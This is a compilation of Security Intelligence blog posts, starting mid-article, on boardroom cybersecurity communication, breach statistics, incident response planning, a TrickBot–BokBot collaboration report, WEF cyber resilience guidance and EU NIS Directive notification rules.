By focusing on business and risk instead of cybersecurity, everybody in the room was fully tuned in. Cybersecurity was just color.

You see, by avoiding the technical nature of cybersecurity, the participants made the mental jump from “cybersecurity as an IT issue” to “cybersecurity as a business and risk issue.” They saw how cybersecurity issues could impact and influence their business development plans or pose growth problems. I remember one participant emphatically saying to the group, “You just made me understand this cybersecurity thing isn’t my IT department’s problem … it’s my problem!”

And just like that, you have a new teammate.

CSOs Are From Mars, CISOs Are From Venus and the Board of Directors Are From Andromeda

There has been a great deal of discussion on whether you should have a chief information officer (CIO), chief security officer (CSO) or chief information security officer (CISO), who should do what, what reporting chains should look like, and the need for this type of specialist. The good news is that there is increased interaction between these security leaders and CEOs and the board of directors. It’s a step in the right direction.

But interaction is not enough; it’s speaking the same language that matters. To do that, you actually need to know what you’re in the business of. No two organizations are alike.

As a general observation, I’ve found that security professionals sometimes have difficulty understanding what drives business in their organization. Reading financial statements and appreciating the importance of cash flow may not be a core competency of security teams, but in practice, they should be.

The same can be said for understanding supply chains, knowing who the key customers and vendors are, and determining which costs can really impact the organization’s ability to generate revenue or meet its business mission. These are all issues that senior leaders and the board of directors care about.

Now, these same issues do not necessarily fall within a security professional’s area of responsibility, but the ability to demonstrate business acumen gives the security professional incredible influence with these other players. Therefore, if security employees can demonstrate that they have more than a one-track mind, they may suddenly find more allies within the organization.

Your Job Is to Keep the Business Going

To keep the business going, you need to know how it works. That’s why asking the right business operations questions will make all the difference. You shouldn’t be asking your colleagues, “How long can you go without a computer?” (The answer almost certainly will be, “I can’t.”) Instead, you should be asking, “You don’t have a computer for 72 hours, how do we keep the business going?” Or, “If we lose network capability for 48 hours, how do we survive the downtime?” You get the idea. Note the emphasis on teamwork.

Ask the right questions the right way and you’ll be better prepared to:

To Improve Your Cybersecurity Posture, You Need to Understand the Business

Most successful business leaders understand that rocky times are part of the normal business cycle. The best even expect rocky times, especially during business development phases. That’s not what worries them.

What worries them is if the organization has the ability and resources to weather the storm. For this reason alone, IT and security professionals need to be able to talk business to the C-suite and the board of directors, especially if new security products need to be added into the organization’s portfolio.

Make Life Easy for Your Board of Directors

With increased pressure on the board of directors to play a more active role in cyber risk governance, it is incumbent on internal cybersecurity professionals to learn what makes the organization tick by talking return on investment, cost, growth metrics, cash flow, business development, resource management and so on. If you can speak the language of business, you are better positioned to demonstrate the value of cybersecurity investments to senior leaders. You’re making their life easier, which in turn makes your life easier.

So whether it’s a few online business basics and governance courses or talking with your nonsecurity colleagues about what drives the business, it’s a worthwhile investment in the grand scheme of things.

I understand these business spaces can sometimes make security employees uncomfortable. But if you can master the business language, you’ll suddenly find yourself not galaxies apart from your C-suite colleagues and board members, but rather in the same room, working together to meet the most pressing cybersecurity and business needs of the organization. That’s a good place to be.

The post The Language of Business: Where the Board of Directors and Security Leaders Can Meet appeared first on Security Intelligence.

Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches

The first quarter of every year produces dozens of reports that both reflect on the threats of the previous year and look ahead to understand how to avoid future security breaches. No single report can offer a foolproof approach to data protection, but the findings in the Identity Theft Resource Center (ITRC)’s “2018 End-of-Year Data Breach Report” serve as a stark reminder of why companies should take a layered approach to security.

A notable and somewhat confounding takeaway from the report was that, despite fewer reported data breaches compared to the previous year, 2018 saw a 126 percent uptick in the number of records breached containing personally identifiable information (PII). In many cases, these breaches were the result of the continued use and reuse of passwords and usernames, as well as vulnerabilities caused by third-party vendors.

How can industry leaders turn last year’s surge in stolen records into a record-breaking year of cybersecurity success?

The Perfect Cyber Threat Storm

Unfortunately, a lack of resources in budget and skilled staff remain the top reasons why many organizations lag in their overall security postures. All the while, though, today’s cybercriminals are increasingly monetizing their activities in various creative ways.

Additionally, the report found that consumers are continuing to choose convenience over security, believing that it is the business’ responsibility to protect the data it collects. That’s why only safeguarding networks is not enough, according to Byron Rashed, vice president of marketing at Centripetal Networks.

“It’s a combination of layered security best practice and user cybersecurity education that will greatly mitigate risk,” said Rashed. “From phishing to ransomware, the attackers’ schemes have become more complex and, in many circumstances, extremely damaging. Add into the equation human error and you now have the perfect cyber threat storm.”

A Familiar Weather Pattern of Data Breaches

What some might see as the brewing of a perfect threat storm, others recognize as a familiar threat. Here, the old adage that hindsight is 20/20 rings true, and it gives defenders a slight advantage. Armed with the insight of what went wrong last year, security professionals can be more proactive in building defense in depth. The enormous jump in the number of exposed sensitive records indicates that organizations should strengthen their data privacy efforts. Looking at a breakdown of the types of compromises from the ITRC report, 39 percent of breaches resulted from hacking and 30 percent resulted from unauthorized access.

Understanding attack methods will inform mitigation, but it’s also important to push through fear, uncertainty and doubt to see that things may not be as bleak as they appear. After all, the report did find that the actual number of data breaches fell by 23 percent from 2017. The business industry, which had the largest number of breaches, also had the least number of records exposed.

“Yes, hackers continue to succeed at stealing more records, but really, how many times can they steal the same Social Security number?” said John Gunn, chief marketing officer at OneSpan. “More importantly, the methods for verifying the identity for someone conducting a remote digital transaction have experienced huge gains in the past year with biometric and behavioral techniques enhanced by artificial intelligence (AI).”

While threat actors may be getting more data, banks and merchants are getting better at stopping the fraud these cybercriminals would otherwise commit with that compromised data, according to Gunn. By sharing massive amounts of information, financial institutions can leverage AI, machine learning-based analyses and anti-fraud platforms to enable the detection of new malware threats and previously hidden attacks in real time.

Build a Foundation of Proactive Cybersecurity Measures

There is arguably no way to say that any particular security strategy can completely prevent a cyberattack, but there are many ways companies can prepare for threats so they are better able to detect and respond to cyberattacks when they do happen.

“Organizations need to build a foundation of proactive measures, such as frequent employee training, preventative security controls and staying up to date with industry best practices,” said Andy Wright, regional director, Northern Europe for Check Point.

Because innovation is moving so swiftly, keeping abreast of industry best practices can seem like a full-time job on its own. Added to that is the reality that attackers are constantly evolving their campaigns, often exploiting zero-day vulnerabilities with attacks that have no known signature — meaning they evade the detection of most antivirus tools.

Making everyone within the organization aware of security risks to the company will help create a security-aware culture in which end users are encouraged to report security issues without the fear of negative consequences. “Reporting a human error early on can help identify and prevent intrusions, which will stop the attack earlier in the kill chain,” said Chad Cragle, information security officer at FormAssembly. If employees feel that their jobs are not at risk for reporting human errors, they are more inclined to share useful information with the security team.

Part of training employees includes education about spear phishing and common malware exploits so that workers are familiar with and better able to identify these threats — and also less likely to fall victim to newer, emerging threats. When employees know what to look for, they are more risk-aware and more likely to report errors early on.

In addition, implementing password updates and two-factor or multifactor authentication will help mitigate the risk of unauthorized access to systems and resources.

“This can be supported by using encrypted PCs and devices. These measures should also be extended to third-party vendors to ensure they’ve enabled the proper security protocols that prevent hackers from accessing their network and jumping across,” Wright said.

Fight the Storm With a Layered Approach to Security

Organizations can build defense in depth through a layered approach to security, which includes intrusion prevention and threat detection and response tools, encryption, access controls, and data loss prevention tools. Because security is not only about technology, it’s also important to think about defense as it relates to people and processes. Another critical piece of preventing and blocking threats is having clear policies that are tested and consistently updated, particularly when it comes to risk management and software updates.

If your security program has all these aspects, you’re well on your way to helping make 2019 a record-breaking year of cybersecurity success.

The post Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches appeared first on Security Intelligence.

When It Comes to Incident Response, Failing to Plan Means Planning to Fail

If there’s one thing I’ve learned from working in cybersecurity, it’s that security incidents do not simply occur, they are caused — either by legitimate users who unintentionally expose company data or malicious actors who seek to breach enterprise systems undetected. Unfortunately, it is much easier for attackers to identify exploitable vulnerabilities than it is for security teams to fix every flaw in the company’s network.

While it would seem the odds are insurmountably stacked against cyberdefenders, there is at least one element of an effective incident response program that even the most ingenious attackers cannot take away from security teams: preparedness and thorough planning.

Why the Time to Contain a Breach Matters

One of the most important metrics in incident response is the time its takes to respond to and contain a security event. According to the “2018 Cost of a Data Breach Study,” the costs associated with a breach were 25 percent lower for organizations that managed to contain the incident within 30 days. That’s a difference of more than $1 million when you consider the overall average cost of a breach, which is particularly concerning since the average time between detection and containment is 69 days.

This so-called mean time to contain (MTTC) depends on the organization’s level of preparedness to rapidly switch into emergency response mode and execute the right tasks in the right order — all under the intense pressure and confusion that invariably arises from a crisis situation. That’s why MTTC is a crucial metric in any emergency response plan template.

6 Steps to Strengthen Your Incident Response Plan

Companies with a mature security posture don’t just take a proactive approach to mitigating threats, they also train their employees on what to do in a worst-case scenario and how to implement a break-glass policy within their organizations. This requires security leaders to continuously review their plans for gaps and inefficiencies and adjust them accordingly to thoroughly understand the impact of a potential breach from a remediation perspective.

Below are six key steps organizations can take to step beyond proactive measures and prepare to respond in a worst-case scenario.

1. Get Management Support

An incident response plan does not just apply to IT and security. You will need cooperation and resources from people outside the security organization, including legal, human resources and other departments.

2. Know Your Risks

To develop your incident response plan, you must understand the kind of events you are addressing and their potential impact to your organization. The loss and exposure of data is one example that is critical to virtually all companies, and not just since the General Data Protection Regulation (GDPR) took effect. Other risks to consider include production outages, flawed products and third-party breaches. Security leaders should work closely with risk officers to identify the threats with the greatest potential business impact.

3. Define Roles and Responsibilities

It takes a lot of hard work from a variety of people and business functions to identify, contain and eradicate an incident. Roles must be clear in advance, and everyone must know his or her responsibility in the event of a security incident.

Typically, this is where a predefined group of response specialists, known as a computer security incident response team (CSIRT), steps in. In addition to security experts, this team should include representatives from management as well as other business units.

4. Determine Communication Channels

In case of emergency, it’s critical to define the relevant communication channels. Communication channels must be open at all times, even if the normal channels are compromised or temporarily unavailable. It’s also important to establish guidelines for what details should be communicated to IT, senior management, relevant departments, affected customers and the public.

5. Rules of Engagement

A lot can go wrong during incident response activities. Valuable information can be destroyed through recklessness and thoughtlessness or, worse, by an attacker who is just waiting to exploit poor user behaviors. Therefore, incident response steps should follow a clear structure and methodology, such as the SANS Institute’s six-step incident response framework and other publicly available resources that can be adapted to fit an organization’s unique needs.

6. Train the Plan

The worst thing you can do is wait until a crisis occurs to execute your incident response process for the first time. Tabletop exercises and run books are always beneficial, but it is most critical to regularly drill the response flow and strive to improve its results in every subsequent drill. It’s also helpful for team members to join discussion groups and share successful practices with other teams to sharpen incident response plans and reduce the potential damage from an impending attack.

The Benefits Outweigh the Costs

While a break-glass policy can add more layers of protection in the event of a breach, it also adds to the workload of your already overwhelmed staff. That’s why many organizations are hesitant to step forward. But the benefits of containing the damage within a short period of time outweigh the value of this investment by far. By adapting a tried-and-true emergency response plan template to your organization’s incident response needs and business goals, you will be in a much better position to minimize the damage associated with a data breach.

The post When It Comes to Incident Response, Failing to Plan Means Planning to Fail appeared first on Security Intelligence.

TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks

Security researchers warned that the cybercriminals behind the two banking Trojans are now collaborating to perform man-in-the-middle (MitM) attacks.

On March 17, Crowdstrike discovered a BokBot proxy module called shadDll in conjunction with TrickBot. The code for the two banking Trojans is 81 percent similar, the researchers said, which means the proxy module can be seamlessly integrated into TrickBot’s extensible, modular framework. It’s possible the two threat groups have been collaborating on an ongoing basis, the researchers added.

Adding New Features Through Threat Group Collaboration

After infecting a machine by duping victims into installing malware via phishing messages, TrickBot can use the shadDll module to access networking functions and install illegitimate secure socket layer (SSL) certificates. At this point, it can do many of the things BokBot can do, including intercepting web traffic and redirecting it, taking screenshots to steal personal information, and injecting other malicious code.

The researchers have attributed the BokBot Trojan to a cybercriminal group called Lunar Spider, while TrickBot is believed to have been created by a group called Wizard Spider. TrickBot, which first emerged in late 2016, has proven highly versatile in attacking financial services firms, and Wizard Spider may include members of the group that developed the earlier Dyre malware, according to Crowdstrike.

How to Stay Ahead of TrickBot’s Tricks

The “IBM X-Force Threat Intelligence Index” for 2019 identified TrickBot as the most prevalent financial malware family of last year, representing 13 percent of all campaign activity. This was in part due to the ability of various threat actors to make use of the Trojan’s variants. For example, the report showed that IcedID distributed TrickBot within its own botnet in a 2018 campaign. However, experts noted that proper security controls, regular user education and planned incident response can help keep this threat at bay.

X-Force researchers also discovered that TrickBot has been used to steal cryptocurrency, and distribution of the BokBot module may make it even more popular. Organizations should employ advanced malware protection to receive alerts for high-risk devices and notifications when malware has been detected to ensure this cooperation among cybercriminals doesn’t lead to even deadlier attacks.

The post TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks appeared first on Security Intelligence.

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly makes way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line

How you respond to a data breach matters.

In today’s world, most companies have documented policies and technologies that can help prepare them for grappling with a cyber intruder, but in many cases those tactics are insufficient — focusing more on answering questions about the incident itself and less about an integrated response that protects reputation, the business and, most importantly, clients.

A breach can be damaging, and the inability to respond effectively can add even more self-inflicted damage. The good news is, while you can’t control whether or not you’re a target of a breach, you can control how — and how well — you respond.

Leading organizations that analyze business trends have taken note of the importance of an integrated response. Earlier this week, Forrester released “The Forrester Wave™: Cybersecurity Incident Response Services, Q1 2019.” This report encourages customers to look for providers that can ensure timely preparation and breach response. Some characteristics highlighted in the report include vendors that have cyber range capabilities to train employees in the event of an attack and provide thorough deliverables to help beyond postmortem of the incident.

Forrester evaluated 15 incident response (IR) service providers and weighed them across 11 criteria. These vendors were identified, evaluated, researched, analyzed and scored. The Forrester Wave report shows how each provider measures up and helps security and risk professionals make the right choice. Forrester noted that IBM “is a strong choice for training and incident preparation services” and that it “attaches X-Force threat intelligence analysts to its IR teams to ensure full situational awareness across the investigation.”

The IBM X-Force Incident Response and Intelligence Services (IRIS) team was created in 2016 and launched alongside the X-Force Command Cyber Range in Cambridge, Massachusetts. We knew that pairing a strong IR team with an immersive range experience that tests skills to survive the inevitable would greatly increase the success our clients experience in the event of a breach.

5 Characteristics of an Elite IR Team

As leaders of the X-Force IRIS team, we’ve been on the front line of hundreds of security breaches and built a team of elite practitioners that help clients recover quickly and effectively in the wake of an attack. Here are the top five characteristics of a world-class response team, based on our experience.

1. It Starts With People

One of the things we often say is, “IR is a team sport.” And with any team, it’s important to make sure each player has a unique set of skills that, when combined with the rest, compose a formidable force against your opponent.

The right team with the right skills means you solve problems faster, build more creative solutions to challenges, and have diverse insight and perspective on situations that allows you to view the problem from a variety of angles. That’s important, because often the attackers have assembled teams of skilled individuals that represent different experiences and perspectives themselves, so constructing an internal team in a similar manner enables you to quickly identify tactics and anticipate the next move.

2. Great Technology, Dynamic Analysis

When you’re technology agnostic, you can go beyond the tools available in your backyard and better ensure you’re getting the right capabilities to achieve your objective. We’ve learned that when we’re not tied to a specific technology or limited to one analytical methodology, we can rapidly evolve our approach to swiftly detect an attacker’s ever-shifting activity.

3. Embedded Threat Intelligence Capabilities

For every case we open, we embed an intelligence analyst who stays involved from start to finish. They bring a consistent intel perspective to each case, augmenting their own skills by leveraging unique insights from the larger intelligence team. Their combined insight gives us exceptional views into an adversary’s actions, tools and methodologies. Understanding these aspects allows faster, more accurate mitigation actions.

4. Comprehensive Remediation

There are two important focus areas for remediation: tactical and strategic. The tactical emphasizes removing an attacker and their access from the victim environment, and the strategic centers on ensuring that same type of attack is not successful again. They both matter, because getting an intruder out quickly and making sure you’re not vulnerable to the same kind of exploitation keeps you safer.

But there’s an element that goes beyond the tactical and the strategic: rebuilding an environment that’s been destroyed as the result of an attack. Rebuilding an environment requires a set of precision skills and, often, a great deal of human resources to ensure it’s done quickly, accurately, and in a way that enables you to continue to operate while rebuilding and recovery take place.

We built the X-Force IRIS team with a set of practitioners that, together, represent thousands of hours of experience rebuilding devastated environments from the ground up. That means when a client has been ravaged by an attack, it can rely on us to not only help it remediate, but keep its business running while we rebuild anew.

5. Train Like You Fight, Fight Like You Train

Even the best IR plan is insufficient if you don’t practice it. We encourage clients to run battle drills on their IR plans (and even put our own to the test). While tabletop exercises can be informative, by far the best way to train for a cyber breach is through an immersive, instructor-led range experience.

We combine our IR expertise with the X-Force Command Cyber Range. Here, we immerse clients in a highly gamified scenario that tests not only their IR plan, but also their human abilities to respond and adapt in a crisis. This helps uncover gaps in existing processes and silos in an organization and develop ways to respond to a breach in an integrated fashion that can’t be replicated in any other way.

Competitive Collaboration

Leaders named in the Forrester Wave™ — such as FireEye, CrowdStrike and Deloitte — are proving that effective incident response is worth the investment. And as competitors, we have the opportunity to share information and create a more robust collective defense for our clients when possible. We are enthusiastic about opportunities like this that allow us to share and build knowledge, because when cybersecurity is implemented correctly, it enables transformation and business growth regardless of the competitive landscape.

The X-Force IRIS team’s investigative and analytical methodology will continue to adapt to meet future IR challenges. By combining cutting-edge methodology with new technologies across disjointed security layers, we envision that our clients will get the context they need to eliminate the noise and identify the most critical threats so they can get can back to what matters most: their core business.

Download the report

The post 5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line appeared first on Security Intelligence.

Breaking Down the Incident Notification Requirements in the EU’s NIS Directive

Our society relies on the availability, security and reliability of network and information systems (NIS). Various security frameworks provide standards and guidance as to which measures organizations should implement to protect IT systems and increase resilience. However, since such recommendations are not ingrained as actual laws in most countries, these best practices and guidelines are often followed solely on a voluntary basis.

This is contrary to the European Union (EU)’s NIS Directive; a legislation that sets a range of network and information security requirements to augment IT security across all EU member states. While the directive covers a few different domains, including preparedness, cross-EU collaboration and incident response (IR), one of its main pillars focuses on breach notification requirements.

In this post, we will focus specifically on the aspects of incident notification contained in the NIS Directive as they apply to operators of essential services (OES).

Regulations Versus Directives

The NIS Directive is a different type of legal act compared to, say, the General Data Protection Regulation (GDPR). The latter is immediately applicable and enforceable by law in all member states. A directive is somewhat different.

While it also applies to all member states, instead of being immediately applicable, it sets goals, requirements and results that must be achieved. It is then up to each member state to devise its own laws on how to reach these goals and what types of penalties noncompliance will carry. The NIS Directive also sets a floor. There can be greater requirements applicable based on the organization’s industry sector and member state(s) it operates in.

This legal status reveals one of the possible issues with a directive: Whereas a regulation is direct law, a directive needs to be transposed into local laws by each member state. These transpositions can result in differences in the implementation of the directive into law, in some cases complicating matters for organizations that operate across borders.

Variance in Incident Notification Definitions

One of the articles in the NIS Directive that has received a lot of attention is Article 14, which outlines requirements for security and incident notification. It stipulates that member states must ensure that OES notify the national competent authority and the national computer security incident response team (CSIRT) in case of an incident that significantly impacts the continuity of an essential service. This is not entirely new — depending on the type of activity or sector, there are already requirements for incident reporting in Europe, including Article 13a of the Telecom Framework Directive.

An additional element of complexity is that, according to Article 5, the identification of OES per sector needs to happen individually within each member state. Although organizations might give input to this process, the actual identification is out of their hands. This process is another way by which the directive could result in various interpretations that end up adding complexity.

The Benefits of Incident Notification

One of the drivers for notification in the context of the directive is to be compliant with legal requirements. However, if the starting point of your organization is to only comply with the bare minimum of these notification requirements, then you will miss out on the opportunities provided by the directive.

Additionally, the bulk of these requirements, including notification and detection capabilities, should already be covered in large part by your existing security environment. If this is not the case, you can use the NIS Directive as a wake-up call to improve your security posture.

From a policymaker’s point of view, the notification requirements can help better identify the challenges within a sector and propose mitigation measures that are based on actual facts and figures. These facts and figures can then be used by CSIRTs (or a responsible authority) to provide more relevant warnings and situation reports together with sector-specific threat intelligence. Similarly, this information can also be used to evaluate cross-border impact of incidents or threats and optionally notify other member states.

Breaking Down Notification Requirements

Now, let’s dive into some details of the NIS Directive. There are essentially three main parts to the notification requirement.

First, prior to notification, organizations need to be able to detect security incidents — i.e., they must possess appropriate detection capabilities. The second part involves defining what a significant incident is and what risks, either directly or indirectly, can have significant impact on an essential service. The last part of the notification requirement involves understanding when, what, how and to whom organizations must report incidents.

First Things First — Detection

Every notification starts with proper detection of an incident. You can find guidelines on detection capabilities in a reference publication from the NIS Cooperation Group on security measures.

The core principles for these security measures include being effective, tailored, compatible, proportionate, concrete, verifiable (evidence of the effective implementation of security policies) and inclusive (includes all security domains that may contribute to reinforcing cybersecurity).

Applying NIS measures to the domain of detection and resilience can be done by:

  • Setting up a detection system to analyze files and protocols — this can include, for example, network intrusion detection systems (NIDSs) or malware sandboxes;
  • Enabling logging on critical systems (log entries should include time stamps);
  • Collecting the logs centrally; and
  • Conducting log correlation and analysis on the events coming from critical systems.

All of the above actions can also be automated with a security information and event management (SIEM) solution.

After Detection — Defining Incidents

But what, exactly, is a security incident? Article 4 defines it as any event that has an actual “adverse effect” on the security of network and information systems. As a side note, the directive does not include a definition of what is covered by “adverse.”

Based on the information from the NIS Cooperation Group, we can combine the definition of an incident with the definition of security of network and information systems. This would redefine an incident to be any event that affects the authenticity, confidentiality, integrity or availability of network and information systems, and has a significant impact on the continuity of the essential service itself.

What Is a Significant Incident?

A set of three parameters from Article 14 of the NIS Directive can be used to determine what is considered a significant incident:

  • The number of users that are affected by the disruption of the essential service.
  • The duration of the incident.
  • The geographic spread of those affected by the incident.

Additionally, the parameters from Article 6 are also helpful in defining what qualifies as a significant incident:

  • What is the dependency of other OES on the service affected by the incident?
  • What is the impact (degree, duration) on economic and social activities or on public safety? In particular, the impact on social activities can be hard to measure for OES.
  • How large is the market share of the affected service?
  • What is the geographic spread that could be affected?
  • How important is the affected element for maintaining a sufficient level of service?

In general, these parameters are most often already included in what OES are accustomed to using to define crises within their services that are unrelated to IT.

The actual criteria, thresholds and parameters for determining substantial incidents are defined by member states. This can include the parameters defined in the NIS Directive, possibly extended with other states or by sector-specific criteria.

The Directive’s Notification Timeline

According to Article 14, organizations need to notify without undue delay, although this timeline can be shortened or specified based on the member state. The term “undue” can also be subjective, but in most cases, this means the organization must send a preliminary notification whenever an incident is first detected, even if all the details are not available yet. The goal is to raise awareness. As your investigation progresses, you can provide intermediate follow-ups, and when the incident is closed, you can provide a full report.

It’s fairly simple to implement this step. Your IR plan should already include a notification and escalation path for certain types of critical incidents during the detection and analysis phases. It should also foresee a final incident report as part of the lessons-learned phase.

In essence, this requirement is an extension of an already established IR plan and recovery process.

Where to Report?

Each member state is free to choose its own reporting framework. This can be the national authority, sectorial authorities or a combination of both in addition to notifying the national CSIRTs.

As an organization, it is important to identify to whom you have to report, exchange contact details between your security team and the notification body, and establish and test this communication process.

Use the NIS Directive as an Opportunity

Similar to the GDPR, you can approach this directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture. The fact that some security requirements are legal requirements can help you further establish your security program.

There are many articles in the directive to take into account, but you should start by focusing on the following:

  • Article 4, which defines a security incident;
  • Article 5, which mandates that member states should identify OES;
  • Article 6, which sets additional parameters to define significant incidents; and
  • Article 14, which requires you to implement security measures and notification processes. This article also contains the three base parameters to define what is a significant incident and describes the accepted delay for notifications.

Unfortunately, despite the fact that the bulk of the NIS Directive has been well-known for quite some time, not all EU member states have finalized the phase of transposing the recommendations into actual laws.

If this is the case for your environment, you might benefit from the situation and provide your lawmakers with input for security measures that would actually improve the level of security for network and information systems in your sector.

The post Breaking Down the Incident Notification Requirements in the EU’s NIS Directive appeared first on Security Intelligence.